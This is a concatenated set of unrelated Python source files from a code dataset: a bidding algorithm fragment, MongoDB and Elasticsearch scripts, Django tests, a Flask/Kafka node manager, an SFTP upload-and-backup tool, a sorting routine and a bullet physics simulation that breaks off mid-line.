= np.append(sigma_N, sigma_bid)\n sol_bid_floors = np.append(sol_bid_floors, sol_bid_floor)\n elif j == 14 :\n\n sigma_bid = total_sum*sigma[i]\n sol_index = np.argmin(np.absolute(total_buget*(native_N- sigma_bid)/(native_o*native_bid_f)))\n sol_bid_floor = native_bid_f[sol_index]\n print(sol_index)\n\n sigma_N = np.append(sigma_N, sigma_bid)\n sol_bid_floors = np.append(sol_bid_floors, sol_bid_floor)\n\n\"\"\"\n\n\nsol_bid_price = np.array([])\n\n\nfor sol_bid_floor in sol_bid_floors :\n if sol_bid_floor >0 and sol_bid_floor <50 :\n win_price = 1.09492801*sol_bid_floor\n bid_price = win_price*1.1\n sol_bid_price = np.append(sol_bid_price, bid_price)\n\n elif sol_bid_floor >=50 and sol_bid_floor <500 :\n win_price = 1.4473831*sol_bid_floor\n bid_price = win_price*1.1\n sol_bid_price = np.append(sol_bid_price, bid_price)\n\n elif sol_bid_floor >=500 and sol_bid_floor <800 :\n win_price = 1.31303544*sol_bid_floor\n bid_price = win_price*1.1\n sol_bid_price = np.append(sol_bid_price, bid_price)\n\n elif sol_bid_floor >=800 and sol_bid_floor <1000 :\n win_price = 1000\n bid_price = win_price*1.1\n sol_bid_price = np.append(sol_bid_price, bid_price)\n\n\n elif sol_bid_floor >1000 :\n win_price = 1.2*sol_bid_floor\n bid_price = win_price*1.1\n sol_bid_price = np.append(sol_bid_price, bid_price)\n\nprint (sol_bid_price)\nprint(sol_indexes)\n\n\nbudget=300000\n\ntotal_real_bud = 0.1*(sol_budgets/1000000) + 0.8*budget*np.exp(sigma*100)/np.exp(sigma*100).sum()\n","sub_path":"bidding algorithm.py","file_name":"bidding algorithm.py","file_ext":"py","file_size_in_byte":10425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"121739894","text":"# Script to merge two collections into one.\r\n\r\nimport pymongo\r\nfrom pymongo import MongoClient\r\nimport time\r\n\r\nconn = MongoClient('localhost') # The MongoDB connection info\r\ndb = conn.testDB # This assumes your database name is testDB \r\nimportedCollection = db.dateCleanTweets # collection to be accessed for tweets\r\nexportedCollection = db.finalTweets # collection to be stored in\r\n\r\ndef insertDocuments():\r\n t = time.process_time()\r\n for eachDocument in importedCollection.find({},{ \"_id\": 0}):\r\n date = eachDocument['date']\r\n text = eachDocument['text']\r\n # if (eachDocument.get('extended_tweet')):\r\n # text = eachDocument['extended_tweet']['full_text']\r\n # elif (eachDocument.get('retweeted_status')):\r\n # text = eachDocument['retweeted_status']['full_text']\r\n # elif (eachDocument.get('retweeted_status') and eachDocument.get('extended_tweet')):\r\n # text = eachDocument['retweeted_status']['full_text']\r\n # else:\r\n \r\n mydict = { \"date\": date, \"text\": text}\r\n # print(mydict)\r\n exportedCollection.insert_one(mydict)\r\n elapsed_time = time.process_time() - t\r\n print( \"Done! Time Elapsed: \" + str(elapsed_time))\r\n \r\ninsertDocuments()\r\n\r\n","sub_path":"code/merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"387533245","text":"import copy\nimport sort_tools\n\ndef bubble_sort(data, low, high):\n for i in range(low, high):\n for j in range(low, high-low-1):\n \t#swap\n if data[j] > data[j+1]:\n temp = data[j]\n data[j] = data[j+1]\n data[j+1] = temp\n \n@sort_tools.timeit('bubble') \ndef sort(data):\n bubble_sort(data, 0, len(data))\n\ndef main():\n data = sort_tools.build_data_set(5)\n\n unsorted = copy.deepcopy(data)\n sort(unsorted)\n\nif __name__ == \"__main__\":\n main()","sub_path":"python/bubble_sort.py","file_name":"bubble_sort.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"223331201","text":"#!/usr/bin/env python3\n#summary.py\nimport sys,os,argparse,csv\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument(\"-i\", \"--input\", nargs=\"+\", help=\"Input file(s)\")\nparser.add_argument(\"-n\", \"--num_samples\", nargs=1, type=int, help=\"Number of samples\", required=True)\nparser.add_argument(\"-o\", \"--output\", help=\"Output filename\")\nparser.add_argument(\"-od\", \"--output_dir\", help=\"Output directory\")\n\nargs = parser.parse_args()\n\nfiles = args.input\n\n###########################################################################################################\n# Setup datamatrix\ndatamatrix = [[] for i in range(args.num_samples[0] + 1)]\t\ndatamatrix[0].append(\"sample\")\n\nlines = list()\n###########################################################################################################\n# Iterate over files; sum metrics\nfor file in files:\n\tsys.stdout.write(\"# Summarising file:\\t{}\\n\".format(os.path.basename(file)))\n\trow_num = 0\t\n\tline_num = 0\n\n\t# Create column name based on file name\n\tdatamatrix[0].append(os.path.basename(file))\n\t\n\ttry:\n\t\tinfile = open(file, \"r\")\n\texcept IOError as err:\n\t\tsys.stderr.write(\"Error while opening infile: {}\\n\".format(str(err)))\n\t\tsys.exit(1)\n\n\t# Discard the first line as these are mapping references\n\tinfile.readline()\n\tlines = infile.readlines()\n\n\t# Iterate over each line to sum numbers\n\tfor line in sorted(lines): # Sorts on sample name\n\t\trow_num += 1\n\n\t\tline = line.rstrip().split(\"\\t\")\n\n\t\t# Collect all sample names from first file; for now assume it has all samples\n\t\tif file == files[0]:\n\t\t\tdatamatrix[row_num].append(line[0])\n\n\t\t\n\t\tsum_list = [float(i) for i in line[1:]] # Type casting values of list\n\t\t\n\t\t# Check that we are actually writing the correct sample and sum the values\n\t\tif line[0] == datamatrix[row_num][0]:\n\t\t\tdatamatrix[row_num].append(sum(sum_list))\n\t\t\n\t\telse:\n\t\t\t# Align the samples and fill in 0s for datasets with no data for a given sample\n\t\t\talign = row_num\n\t\t\twhile line[0] != datamatrix[align][0]:\n\t\t\t\tdatamatrix[align].append(0) \n\t\t\t\talign += 1\n\n\t\t\tdatamatrix[align].append(sum(sum_list))\n\n\tlines.clear()\n\tinfile.close()\n\n###########################################################################################################\n# Set up outfile name\nif args.output is None:\n\toutname = \"summary_\" + (os.path.basename(args.input[0]).split(\"_\")[-1]).split(\".\")[0] + \".csv\"\nelse:\n\toutname = args.output + \".csv\"\n\n###########################################################################################################\n# Setup output directory\nif args.output_dir is not None:\n\tif args.output_dir.startswith(\"/home/\"):\n\t\toutdir = args.output_dir\n\telse:\t\n\t\toutdir = os.getcwd() + \"/\" + args.output_dir\n\n\tif not os.path.exists(outdir):\n\t\tos.mkdir(outdir)\nelse: \n\toutdir = os.path.dirname(args.input[0]) + \"/summary/\"\n\tif not os.path.exists(outdir):\n\t\tos.mkdir(outdir)\n\noutname = outdir + outname\nsys.stdout.write(\"Writing \\\"{}\\\" to:\\t{}\\n\".format(os.path.basename(outname), outdir))\n###########################################################################################################\n# Print to file\ntry:\n\twith open(outname, \"w+\") as csvfile:\n\t\tcsvwriter = csv.writer(csvfile, delimiter=\"\\t\")\n\t\tcsvwriter.writerows(datamatrix)\n\nexcept IOError as err:\n\tsys.stderr.write(\"Error while opening outfile: {}\\n\".format(str(err)))\n\tsys.exit(1)\n","sub_path":"summary.py","file_name":"summary.py","file_ext":"py","file_size_in_byte":3316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"136245420","text":"from decimal import Decimal\n\nfrom django.test import TestCase\nfrom django.core.urlresolvers import reverse\nfrom django.db.utils import IntegrityError\nfrom django.core.exceptions import ObjectDoesNotExist, ImproperlyConfigured\nfrom django import forms\n\nfrom django_lindau import config\nfrom django_lindau.models import Settings\nfrom django_lindau.base import Config\nfrom django_lindau.forms import SettingsForm\n\nclass SettingsModel(TestCase):\n\n def test_create_some_settings(self):\n Settings.objects.create(key='foo', value=10.53)\n Settings.objects.create(key='bar', value='abracadabra')\n\n self.assertEqual(Settings.objects.get(key='foo').value, 10.53)\n self.assertEqual(Settings.objects.get(key='bar').value, 'abracadabra')\n\n def test_unique_key(self):\n Settings.objects.create(key='foo', value=10.53)\n with self.assertRaises(IntegrityError):\n Settings.objects.create(key='foo', value='abracadabra')\n\nclass ConfigTest(TestCase):\n\n def setUp(self):\n self.config = Config()\n \n def test_accessing_unregistered_settings(self):\n with self.assertRaises(ImproperlyConfigured):\n self.assertEqual(self.config.doesnt_exist, '')\n\n def test_register_setting(self):\n self.config.register(key='foo', default='bar', verbose_name='Test')\n self.assertEqual(self.config.foo, 'bar')\n self.assertEqual(self.config._registry['foo']['verbose_name'], 'Test')\n Settings.objects.filter(key='foo').update(value='test')\n self.assertEqual(self.config.foo, 'test')\n\n def test_invalid_key(self):\n # Cannot register methods or attributes of Config as settings\n with self.assertRaises(ImproperlyConfigured):\n self.config.register(key='register')\n\n with self.assertRaises(ImproperlyConfigured):\n self.config.register(key='_registry')\n\nclass Form(TestCase):\n\n def test_autodiscovered_settings(self):\n '''\n Settings can be registered in a lindau.py file in each app directory (here in the tests package)\n '''\n self.assertEqual(config.name, 'Tim')\n self.assertEqual(config.number, 10)\n self.assertEqual(config.float, 6.66)\n self.assertEqual(config.decimal, Decimal('7.50')) \n self.assertEqual(config.email, 'test@test.com')\n \n def test_default_fields(self):\n form = SettingsForm()\n fields = form.fields\n\n self.assertIsInstance(fields['name'], forms.CharField)\n self.assertIsInstance(fields['number'], forms.IntegerField)\n self.assertIsInstance(fields['float'], forms.FloatField)\n self.assertIsInstance(fields['decimal'], forms.DecimalField)\n self.assertIsInstance(fields['email'], forms.EmailField)\n\n self.assertEqual(fields['email'].label, 'E-Mail')\n \n def test_save_fields(self):\n data = {'number': 10, 'float': 6.66, 'name': 'Max Mustermann', 'decimal': Decimal('7.50'), 'email': 'test@test.com'}\n form = SettingsForm(data=data)\n form.is_valid()\n form.save()\n self.assertEqual(Settings.objects.get(key='name').value, 'Max Mustermann')\n\n def test_wrong_input(self):\n data = {'number': 'wrong input!', 'float': 6.66, 'name': 'Max Mustermann', 'decimal': Decimal('7.50'), 'email': 'test@test.com'}\n form = SettingsForm(data=data)\n form.is_valid()\n self.assertIn('number', form.errors)\n\n def test_set_setting_to_None_and_reinit_form(self):\n data = {'number': '', 'float': 6.66, 'name': 'Max Mustermann', 'decimal': Decimal('7.50'), 'email': 'test@test.com'}\n form = SettingsForm(data=data)\n form.is_valid()\n form.save()\n\n form = SettingsForm()\n self.assertIsInstance(form.fields['number'], forms.IntegerField)\n\nclass View(TestCase):\n\n def test_settings_view(self):\n response = self.client.get(reverse('settings'))\n form = response.context['form']\n self.assertIsInstance(form, SettingsForm)\n\n data = {'number': 10, 'float': 6.66, 'name': 'Max Mustermann', 'decimal': Decimal('7.50'), 'email': 'test@test.com'}\n response = self.client.post(reverse('settings'), data=data)\n self.assertEqual(Settings.objects.get(key='name').value, 'Max Mustermann')\n\n response = self.client.post(reverse('settings'), data={'number': 'wrong input!'})\n self.assertEqual(response.status_code, 200)\n form = response.context['form']\n self.assertIsNotNone(form.errors['number'])","sub_path":"tests/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":4513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"66822208","text":"# doskvolMasterGenerator.py\n# A menu interface capable of calling the individual Doskvol generators\n\nimport doskvolBuildingGenerator as building\nimport doskvolDemonGenerator as demon\nimport doskvolGhostgenerator as ghost\nimport doskvolPeopleGenerator as npc\nimport doskvolStreetsGenerator as street\n\n\ndef main():\n while True:\n generator = input(\n \"\"\"\nSelect generator:\n[1] Create common NPC\n[2] Create rare NPC\n[3] Create street description\n[4] Create common building desciption\n[5] Create rare building description\n[6] Create a demon\n[7] Create a ghost\n[8] Quit\n\n\"\"\"\n )\n if generator == \"1\":\n npc.print_person(\"common\")\n\n elif generator == \"2\":\n npc.print_person(\"rare\")\n\n elif generator == \"3\":\n street.print_street()\n\n elif generator == \"4\":\n building.print_building(\"common\")\n\n elif generator == \"5\":\n building.print_building(\"rare\")\n\n elif generator == \"6\":\n demon.print_demon()\n\n elif generator == \"7\":\n ghost.print_ghost()\n\n elif generator == \"8\":\n break\n\n else:\n print(\"Invalid choice. Please try again.\")\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"src/doskvolMasterGenerator.py","file_name":"doskvolMasterGenerator.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"151547700","text":"import serial\n \nport = \"COM5\"\nbaud = 115200\n \nser = serial.Serial(port, baud, timeout=0.1)\n # open the serial port\nif ser.isOpen():\n print(ser.name + ' is open...')\n try:\n while(1):\n cmd = \"0x0E 01 01 0x07\\n\"\n ser.write(cmd.encode())\n print(\"TX : \" ,cmd.encode())\n print(\"RX : \" + str(ser.readline(),'utf-8' ))\n except Exception:\n print(\"errror\")\n","sub_path":"MAG3110/mag3110_v01.py","file_name":"mag3110_v01.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"581443699","text":"#!/usr/bin/env python3\n\nfrom _thread import *\nimport random\nimport string\nimport time\nimport socket\nimport json\nfrom flask import *\nfrom threading import *\nimport subprocess\nimport sys\n\nfrom time import sleep\nfrom json import dumps\nfrom kafka import KafkaProducer\n\nfrom models import *\n\nserver_load = {}\napps_load = []\napps_pid = []\nlast_port = 0\n\nwith open('runtime_server.json') as f:\n server_list = json.loads(f.read())\n\napp = Flask(__name__)\n#app.config[\"DEBUG\"] = True\nproducer = KafkaProducer(bootstrap_servers=[\n 'localhost:9092'], value_serializer=lambda x: dumps(x).encode('utf-8'))\n\n\ndef init_servers():\n for x in server_list:\n #app = Flask(__name__)\n # print(json.dumps(x))\n print(x['ip'], x['port'])\n server_load[x['id']] = (\n Server(x['id'], x['ip'], x['port'], x['active'], x['health'], x['applications'], x['username'], x['password']))\n last_port = x['port']\n producer.send(KAFKA_TOPIC_SERVER_LIST, json.dumps(x))\n\n start_new_thread(app.run, (x['ip'], x['port']))\n subprocess.Popen([sys.executable, 'health_probe_service.py'])\n input()\n\n\ndef createNodeServer():\n global last_port\n ip = '127.0.0.1'\n l = len(server_load)\n last_port += 1\n id = ''.join(random.choices(string.ascii_letters + string.digits, k=7))\n server_list.append({'id': id, 'ip': ip, 'port': last_port, 'active': 1,\n 'health': 1, 'applications': 0, 'username': 'test', 'password': 'test'})\n server_load[id] = Server(id, ip, last_port, active=1, health=1,\n applications=0, username='test', password='test')\n\n with open('runtime_server.json', 'w') as f:\n json.dump(server_list, f)\n\n producer.send(KAFKA_TOPIC_SERVER_LIST, json.dumps(x))\n #start_new_thread(app.run, (x['ip'], x['port'], True))\n\n\n@app.route('/fetchDetails')\ndef fetchSensorData():\n if request.method == 'POST':\n return 'Not supported', 401\n x = request.args.get('id')\n if x is None:\n return {'msg': 'Server ID is absent'}, 400\n if int(x) not in server_load.keys():\n return {'msg': 'Server ID not found'}, 400\n sv = server_load[int(x)]\n return {'ip': sv.ip, 'port': sv.port, 'cpu': sv.cpu, 'ram': sv.ram, 'num_apps': sv.num_apps}, 200\n\n\n@app.route('/')\ndef checkServerHealth():\n if request.method == 'POST':\n return 'Not supported', 401\n return {'msg': 'Server health check successful'}, 200\n\n\n@app.route('/runapp')\ndef runApplication():\n if request.method == 'POST':\n return 'Not supported', 401\n app_id = request.args.get('app_id')\n user_id = request.args.get('user_id')\n sensor_list = request.args.get('sensor_list')\n ram_req = request.args.get('ram_req')\n cpu_req = request.args.get('cpu_req')\n app_path = request.args.get('app_path')\n algo_path = request.args.get('algo_path')\n ip = request.host\n port = request.host\n if app_id is None:\n return {'msg': 'App ID is absent'}, 400\n if user_id is None:\n return {'msg': 'User ID is absent'}, 400\n if app_path is None:\n return {'msg': 'App Path is absent'}, 400\n if algo_path is None:\n return {'msg': 'Algo Path is absent'}, 400\n apps_load.append(Application(app_id, user_id, sensor_list,\n ip, port, ram_req, cpu_req, app_path, algo_path))\n pid = subprocess.Popen([sys.executable, app_path])\n apps_pid.append(pid)\n return {'msg': 'Success'}, 200\n # execute APP\n\n\n@app.route('/stopapp')\ndef stopApplication():\n if request.method == 'POST':\n return 'Not supported', 401\n app_id = request.args.get('app_id')\n user_id = request.args.get('user_id')\n if app_id is None:\n return {'msg': 'App ID is absent'}, 400\n if user_id is None:\n return {'msg': 'User ID is absent'}, 400\n for i in range(0, len(apps_load)):\n ap = apps_load[i]\n if ap.app_id == app_id and ap.user_id == user_id:\n apps_pid[i].terminate()\n apps_load.pop(i)\n apps_pid.pop(i)\n return {'msg': 'Success'}, 200\n return {'msg': 'App ID not found'}, 401\n\n\ninit_servers()\n# if __name__ == '__main__':\n# init_servers()\n# app.run(debug=True)\n","sub_path":"hackathon2/node_manager.py","file_name":"node_manager.py","file_ext":"py","file_size_in_byte":4251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"95544750","text":"import os\n# 命令库\nimport paramiko\n\n# 打包命令 pyInstaller -F upload.py\n\n\n# 从配置文件读取配置\nimport configparser\nconf = configparser.ConfigParser()\nconf.read(\"conf.ini\", encoding='UTF-8')\n\n# 待复制文件列表\nlocalFilePath = conf.get(\"default\", \"localFilePath\") or \"\"\n# 服务器目录路径\nremotePath = conf.get(\"default\", \"remotePath\").split(\",\") or []\n# 备份文件目录\nbackPath = conf.get(\"default\", \"backPath\") or \"\"\n# 服务器地址\nssh_conf = {\n \"hostname\": conf.get(\"default\", \"hostname\") or \"\",\n \"port\": conf.get(\"default\", \"port\") or \"\",\n \"username\": conf.get(\"default\", \"username\") or \"\",\n \"password\": conf.get(\"default\", \"password\") or \"\"\n}\n\n\n# 过滤字符串\ndef normalize(path):\n if not path.endswith(\"/\"):\n path += \"/\"\n path = path.replace(\"\\\\\", \"/\")\n path = path.replace(\"\\n\", \"\")\n return path\n\n\nlocalFilePath = normalize(localFilePath)\nbackPath = normalize(backPath)\nremotePath = [normalize(path) for path in remotePath if(len(str(path)) != 0)]\n\n\n# 获取ssh对象\ndef get_ssh():\n # 首先指定你的私钥在哪个位置(ssh是自动找到这个位置,Python不行,必须指定)\n # private_key = paramiko.RSAKey.from_private_key_file('id_rsa')\n\n # 创建SSH对象\n ssh = paramiko.SSHClient()\n # 允许连接不在know_hosts文件中的主机,否则可能报错:\n # paramiko.ssh_exception.SSHException: Server '192.168.43.140' not found in known_hosts\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n\n # 连接服务器\n try:\n ssh.connect(hostname=ssh_conf.get(\"hostname\"),\n port=ssh_conf.get(\"port\"),\n username=ssh_conf.get(\"username\"),\n password=ssh_conf.get(\"password\"))\n except TimeoutError as e:\n print(\"连接远程服务器超时,请检查连接配置!\")\n\n # stdin:标准输入(就是你输入的命令);\n # stdout:标准输出(就是命令执行结果);\n # stderr:标准错误(命令执行过程中如果出错了就把错误打到这里)\n # stdout和stderr仅会输出一个\n # stdin, stdout, stderr = ssh.exec_command('df')\n\n # 获取命令结果\n # 这个有问题,不显示错误,可以修改一下,先判断stdout有没有值,如果输出没有,就显示错误\n # result = stdout.read().decode()\n\n # 关闭连接\n # ssh.close()\n return ssh\n\n\n# 获取当前的时间\ndef get_current_time(is_chinese=False):\n import time\n import locale\n if not is_chinese:\n return time.strftime('%Y-%m-%d %H:%M:%S')\n elif is_chinese:\n locale.setlocale(locale.LC_CTYPE, 'chinese')\n return time.strftime('%Y年%m月%d日%H时%M分%S秒')\n\n\n# 打印配置信息\nprint(\"待上传文件目录(localFilePath):\"+localFilePath)\nprint(\"远程服务器目录(remotePath):\")\nfor path in remotePath:\n print(path)\nprint(\"配置文件保存目录(backPath):\"+backPath)\nprint(\"服务器连接信息:\")\nfor key, value in ssh_conf.items():\n print('{key}:{value}'.format(key=key, value=value))\nos.system('pause')\n\n# 获取ssh连接对象\nprint(\"---正在连接远程服务器---\")\nssh = get_ssh()\nprint(\"---远程服务器连接成功---\")\nsftp = ssh.open_sftp()\nsucc_count = 0\nerror_count = 0\n\n# 待上传文件\nwait_upload_file_list = []\nfor path, dir_list, file_list in os.walk(localFilePath):\n # 同步的路径\n afterPath = path.replace(localFilePath, \"\")\n # 反斜转正斜\n afterPath = afterPath.replace(\"\\\\\", \"/\")\n\n # 待复制的文件\n for file in file_list:\n filePath = afterPath + \"/\" + file\n wait_upload_file_list.append((localFilePath+filePath, filePath))\n\n# 先做备份\nprint(\"---开始备份服务器文件---\")\nbackPath += get_current_time(True) + \"/\"\n# 目录备份\nfor path in remotePath:\n\n for item in wait_upload_file_list:\n\n localPath = item[0]\n filePath = item[1]\n\n backLocalPath = backPath + path.replace(\"/\", \"#\") + \"/\" + filePath\n # 创建目录\n try:\n if not os.path.exists(os.path.dirname(backLocalPath)):\n os.makedirs(os.path.dirname(backLocalPath))\n except PermissionError as e:\n print(\"创建备份目录失败:权限不足\")\n print(\"---停止运行---\")\n exit(0)\n\n try:\n # path均为带文件后缀,不能是目录,且不能是反斜杠路径\n sftp.get(path + filePath, backLocalPath)\n except FileNotFoundError as e:\n print(\"备份文件[\"+path + filePath+\"]失败,文件不存在\")\n pass\n except PermissionError as e:\n print(\"备份文件[\"+path + filePath+\"]失败,权限不足\")\n print(\"---停止运行---\")\n exit(0)\n\nprint(\"备份完成,备份保存目录:\"+backPath)\nos.system('pause')\nprint(\"---开始上传文件至服务器---\")\n# 上传文件\nfor path in remotePath:\n for item in wait_upload_file_list:\n localPath = item[0]\n filePath = item[1]\n try:\n # 创建远程目录\n remoteDir = os.path.dirname(path + filePath)\n ssh.exec_command(\"mkdir -p \" + remoteDir)\n\n sftp.put(localPath, path + filePath)\n print(\"已上传文件[\"+localPath+\"]至[\"+path + filePath+\"]\")\n except FileNotFoundError as e:\n print(\"失败\")\n print(e)\n error_count += 1\n continue\n except PermissionError as e:\n error_count += 1\n print(\"上传文件[\"+localPath+\"]失败,权限不足\")\n continue\n except Exception as e:\n error_count += 1\n print(\"上传文件[\"+localPath+\"]失败\"+\",错误:\")\n print(e)\n continue\n succ_count += 1\n\nprint(\"上传完毕,成功\" + succ_count.__str__() + \"个,失败\" + error_count.__str__() + \"个\")\n\n# 关闭连接\nssh.close()\n\nos.system('pause')\n","sub_path":"upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":5962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"455899261","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Feb 25 12:55:12 2019\n\n@author: gustavo\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\ndef secuencia03(n, x):\n phi_nx = 1/(n *np.pi) * (np.sin(n*x)**2/x**2)\n return phi_nx\n\nx = np.linspace(-5, 5, 200)\n\nfor i in [1,2,3]:\n plt.plot(x, secuencia03(i, x), label=\"n = \" + str(i))\n \nplt.title(\"Secuencia delta $\\phi_{n}(x)$\") \nplt.legend(loc=1)\nplt.show()","sub_path":"Tema 2 - Primeras tecnicas de solucion/python/untitled3.py","file_name":"untitled3.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"185810016","text":"# -*- coding: utf-8 -*-\n\"\"\"\n__mktime__ = '2018/7/18'\n__author__ = '原之安'\n__filename__ = 'Spider'\n\"\"\"\n\nimport urllib\nimport json\nfrom elasticsearch import Elasticsearch\nfrom elasticsearch import helpers\nfrom itertools import chain\nfrom multiprocessing import Pool\nimport sys\nimport re\n\n\n#根据searchStr找到dockey\ndef search(searchStr, dp):\n params = urllib.urlencode({'q': searchStr,\n 'dp': dp,\n 'pn': '50'})\n # 'f1': 'TI,PN,AN,PD'})\n search_url = 'http://172.21.201.131:8200/search?'\n res = urllib.urlopen(search_url + params)\n return eval(res.read())\n\n#根据dockey找到全文数据\n\n\n#解析全文JSON\ndef read_json(result_first):\n ll = []\n size = -1\n try:\n json_str = eval(json.dumps(result_first))\n result = json_str['RESULT']\n size = json_str['FOUNDNUM']\n for l in range(len(result)):\n PN = result[l]['PN']\n AN = result[l]['AN']\n # PD = result[l]['PD']\n PD = 'error'\n dockey = {'index': {'_id': PN + '@' + AN + '@' + PD}}\n ll.append(dockey)\n return size, result, ll\n except:\n print(\"error:\" + result_first)\n return size, result, ll\n\n\n#main\ndef store_to_es(date_str):\n\n pattern = re.compile('(?<=>=).*?(?=\\))')\n filename = pattern.search(date_str).group()\n print(filename)\n result_file = open('E:/result/' + filename + '.json', 'a')\n\n dp = 0\n print(date_str)\n es = Elasticsearch(['172.21.201.141:9200'],\n sniff_on_start=True,\n sniff_on_connection_fail=True,\n sniffer_timeout=60\n )\n\n size, doc_list, dockey_list = read_json(search(date_str, dp))\n print(size)\n for i in range(1, int((size / 50) + 2)):\n\n size, doc_list, dockey_list = read_json(search(date_str, i))\n\n store_list = list(chain.from_iterable(zip(dockey_list, doc_list)))\n\n result_file.writelines(str(store_list) + '\\n')\n\n print(store_list)\n\n es.bulk(index='intell_property', doc_type='text_info', body=store_list)\n\n\nif __name__ == '__main__':\n\n p = Pool()\n\n a, b = sys.argv[1].split(',')\n for i in range(int(a), int(b) + 1):\n i = str(i)\n date_str = \"((AD>=\" + i + \"0101) AND (AD<=\" + i + \"0630))\"\n print(date_str)\n p.apply_async(store_to_es, (str(date_str),))\n date_str = \"((AD>=\" + i + \"0701) AND (AD<=\" + i + \"1231))\"\n print(date_str)\n p.apply_async(store_to_es, (str(date_str),))\n\n p.close()\n p.join()\n\n #\n # p = Pool()\n #\n # dates = []\n # date_list = range(1980, 1983)\n #\n # # date_str = \"((AD>=\" + date + \"0101) AND (AD<=\" + date + \"1231))\"\n #\n # for d in date_list:\n # date_str = \"((AD>=\" + d + \"0101) AND (AD<=\" + d + \"1231))\"\n # dates.append(date_str)\n #\n # for date in dates:\n # p.apply_async(store_to_es, (str(date),))\n #\n # p.close()\n # p.join()\n","sub_path":"database_Demo/Spider.py","file_name":"Spider.py","file_ext":"py","file_size_in_byte":3034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"530139436","text":"# Definition for singly-linked list.\r\n# class ListNode:\r\n# def __init__(self, x):\r\n# self.val = x\r\n# self.next = None\r\n\r\nclass Solution:\r\n def middleNode(self, head: ListNode) -> ListNode:\r\n if head.next == None: # 考虑边界情况\r\n return head\r\n if head.next.next == None:\r\n return head.next\r\n # 定义保留头节点\r\n tmp = head\r\n tmp_list = []\r\n while tmp:\r\n tmp_list.append(tmp.val)\r\n tmp = tmp.next\r\n for _ in range(len(tmp_list)//2): # 循环结束正好到达中间位置\r\n head = head.next\r\n return head\r\n'''\r\n题:\r\n输入:[1,2,3,4,5]\r\n输出:此列表中的结点 3 (序列化形式:[3,4,5])\r\n返回的结点值为 3 。 (测评系统对该结点序列化表述是 [3,4,5])。\r\n注意,我们返回了一个 ListNode 类型的对象 ans,这样:\r\nans.val = 3, ans.next.val = 4, ans.next.next.val = 5, 以及 ans.next.next.next = NULL.\r\n\r\n解:\r\n遍历一遍链表,将其保存在数组tmp_list中,中间结点的索引为len(tmp_list) // 2,将指针移到该位置即可。\r\n'''","sub_path":"876.py","file_name":"876.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"576791104","text":"from datetime import datetime\n\nclass Timer:\n def __init__(self):\n self.started = None\n self.finished = None\n self.elapsed = None\n self.seconds = None\n\n def start(self):\n self.started = datetime.now()\n\n def stop(self):\n self.finished = datetime.now()\n self.elapsed = self.finished-self.started\n sectime = ((self.elapsed.seconds*1000000)+(self.elapsed.microseconds))/1000000.0\n self.seconds = round(sectime,3)\n return self.seconds\n","sub_path":"savman/stopwatch.py","file_name":"stopwatch.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"178706662","text":"import sys, pygame, math\n#pygame.init()\n#pygame.font.init()\n\ndef to_pygame(coords):\n \"\"\"Convert coordinates into pygame coordinates (lower-left => top left).\"\"\"\n return (int(coords[0])), int((height - coords[1]))\n\ndef sin(): return math.ceil(math.sin(math.radians(theta)))\n\ndef cos(): return math.ceil(math.cos(math.radians(theta))) \n\ndef drag(currVel, xDirect):\n calcDrag = (.5 * drag_c * rho * math.pow(currVel, 2) * surface_area)\n if xDirect:\n return calcDrag\n return -1 * ((calcDrag * currVel) / math.fabs(currVel))\n #return calcDrag if xDirect else -1 * (calcDrag * currVel) / math.fabs(currVel)\n\ndef acceleration(currDrag, yDirec): #return gravity + currDrag / mass if yDirec else -1 * currDrag / mass\n if yDirec:\n return gravity + (currDrag / mass)\n return -1 * currDrag / mass\n\ndef velocity(velo, accel): return velo + accel * step\n\ndef position(pos, velo): return pos + velo * step\n\ndef draw_bullet():\n textsurface = myfont.render(toPrint, False, green)\n screen.blit(textsurface, (0,0))\n pygame.draw.circle(screen, green, to_pygame((x, y)), radius)\n pygame.display.update()\ndef base_values():\n global x, y, accel, vel\n x = y = 1\n accel = [0, 0]\n vel = [veloi * cos(), veloi * sin()]\ndef begin_prompt():\n ''' global veloi, surface_area, mass, rho, theta,\n if input(\"Would you like to run a bullet simulation? Y to continue: \") == \"Y\" or == \"y\":\n veloi = input(\"Please enter a the muzzle velocity in m/s: \")\n diameter = input(\"Please enter the caliber or metric diameter as a whole number: \")\n cal_or_mm = input(\"Caliber or mm?: \") '''\n return 0\nsize = width, height = 1536, 864\nblack = 0, 0, 0\ngreen = 0, 255, 0\nwhite = 255, 255, 255\n#screen = pygame.display.set_mode(size)\n#pygame.display.set_caption(\"Bullet Model\")\nradius = 2\nx = 1\ny = 1\nmass = .016 #mass in kg\ngravity = 